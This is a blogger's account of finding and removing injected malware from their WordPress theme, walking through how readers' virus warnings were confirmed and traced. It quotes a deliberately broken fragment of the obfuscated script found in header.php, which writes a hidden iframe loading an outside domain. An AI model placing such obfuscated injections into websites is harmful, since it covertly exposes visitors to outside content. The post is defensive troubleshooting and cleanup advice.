So, I had some urgent work to do on the site tonight and wanted to share my results. First off, I want to thank Robin at NakedinEden.com as well as Dena at EvolutionYou.net for pointing out that my site was being reported to have a virus or unsafe site reference on it over the last couple of days.  I didn’t believe this at first because I just couldn’t find anything about this or confirm it.  Anyway, I thought I would share a bit of what I went through to narrow this down and finally find it (and it seems to have fixed it).  It’s amazing to me how sneaky some of these hacks can be and even more so, how they get access in the first place.  I’m a software designer and developer and so I generally know my way around computers, websites and do at least the basic steps to protect yourself, yet I am constantly amazed that that is not enough nowadays.

Confirm it

Anyway, some of the actions I took in searching for this were:

1. Robin mentioned the specific text which was showing in your virus detection so I started hunting for that. “seeintraf.com/click/in.cgi?3”
2. I did a full database scan for all URLs and Author Names in case it was lodged inside some comment from someone (I’ve had image links for gravatars before showing as malformed URLs like this before). After a full search, nothing.
3. I loaded the site into every browser out there from multiple computers in multiple locations with multiple virus softwares and none of them showed any problems or detected anything at all.
4. I then did a full site extract and download to RAW HTML using a website downloader that will download all the images, links, URLS and everything into RAW html. I searched that with full text search to find any of those URL I characters from the virus software. Nothing.
5. I ran a number of online virus scanner that check the site for bad links and online viruses or threats at the site. Nothing. None of them found any problems.
6. I did a google search of course for the text and there were only two web sites in a forum that even mentioned it, but provided no help in solving it. Still nothng.
7. I checked out the errors and blocked content showing up in IE for each page by pressing the little eyeball icon in the lower statusbar. This finally showed the referenced URL above and listed it as a blocked site and a tracking URL. OK, finally confirmed it!

Seek it

A relief to see that I was not just going crazy though and finally could confirm what my helpful readers had pointed out.  Next on to solving it.  I had no idea where to start and just started playing and testing.  Here is what it took to find it.

1. Turned off plugins to see if any made a difference to the tracking cookie incase I had some bad plugin.  Nope. No differences.
2. Checked pages with and without the sidebar on to narrow down WHERE the URL could be loading from.  No difference with or without it.
3. Checked file access times and permissions of all my site files for wordpress, nothing had any recent edits.
4. Checked log files to see if any activity that was likely NOT mine showed up in my website logs.  Nothing.
5. Checked for wordpress updates and of course searched all the wordpress forums for this type of error.  Nothing.
6. Finally, swapped the theme back to the wordpress default theme and voila, problem went away.  So, this meant that the problem was in my theme files

A nice relief came at this stage to at least know where the problems was even if I hadn’t narrowed down on it completely.  It was just a matter of time though.  The easy part here though.  Since I had already tested if plugins or sidebar made a difference and it didn’t, I knew the problem had to be in my headers, footers or main display pages.  Surprisingly, I came across this in my header.php file right after the start of the body text.

<script language=JavaScript>document.write(unescape(‘%3c%69f’+’ra’+’m%65 %7   …..  65ig%68%74=%31 border=0 framebor%64e%72=0 %73%72c=%27htt’+’p://pr%6ffil%65sgu%69de.c%6fm …..  hp%3f%73%69d=1%27%3e%3c/if%72am%65%3e’))</script>

Note: I’ve broken the sequence of escape codes so this can’t be reproduced by anyone.  It appears that the hack puts the URL into escape codes so you can’t easily just search for the URL like I had already tried to find this reference.  Sneaky, that is for sure.

Destroy it

So, I removed it and tested the site.  It was still the same problem, but I did notice some other URLS removed from the blocked content list.  So, I checked my footer.php file for my theme as well and there it was again, a similar chunk of unescaped codes being written into my browser html.  Once I removed this as well, I refreshed the site and it no longer has any of the blocked URLs showing up so it seems to have fixed the problem.  I’ll obviously keep an eye on this and make sure it doesn’t come back.  Hackers have a tendency (since they are usually automated systems) to get in over and over under the vulnerability is actually solved.  I’ll have to continue looking into what that might be, as I have no idea right now.

I changed all my account passwords on my site, searched through the rest of my theme files and put all my changes back on for plugins and other site content.  I’ve made a full site backup and database backup now just to be safe and will watch the site closely for a few days to ensure nothing else happens.  I’ve let my ISP know about the hack as they often trace down attacks, especially if they can detect it on other domains as well and catch whoever is doing it.  I hope this articles helps someone someday with a similar problems, gives you ideas for troubleshooting your own site problems if you have any or at least reminds you to backup your own blog and ensure you keep your passwords and content under close watch.  Again, I thank my readers for informing me of this issue and I hope the site here didn’t cause any other issues for anyone.  It doesn’t sound like that virus is any threat to your PC directly, but I honestly don’t know what they could have been tracking?